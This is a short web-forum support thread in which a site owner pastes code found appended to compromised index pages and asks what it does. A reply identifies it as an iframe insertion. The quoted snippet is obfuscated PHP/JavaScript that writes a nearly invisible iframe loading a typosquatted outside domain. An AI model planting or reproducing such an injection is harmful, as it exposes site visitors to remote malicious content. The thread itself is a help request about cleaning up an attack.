Forums

[resolved] PHP Security Hole? (2 posts)

  1. CK Hicks
    Member
    Posted 2 years ago #

    Hey all,

    Logged in this morning to see our index pages had been altered...the end of each had this code attached:

    <?php echo '<script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>'; ?>

    Any ideas what this was intending to do? I'm patching to the latest version now, but for a non-destructive hack it was pretty disruptive. Basically rendered the entire index file useless.

    If anyone has any ideas please let me know!

  2. iridiax
    Member
    Posted 2 years ago #

    It's an iframe insertion from a Chinese website. For more info, see:

    http://wordpress.org/support/topic/281767

Topic Closed

This topic has been closed to new replies.

About this Topic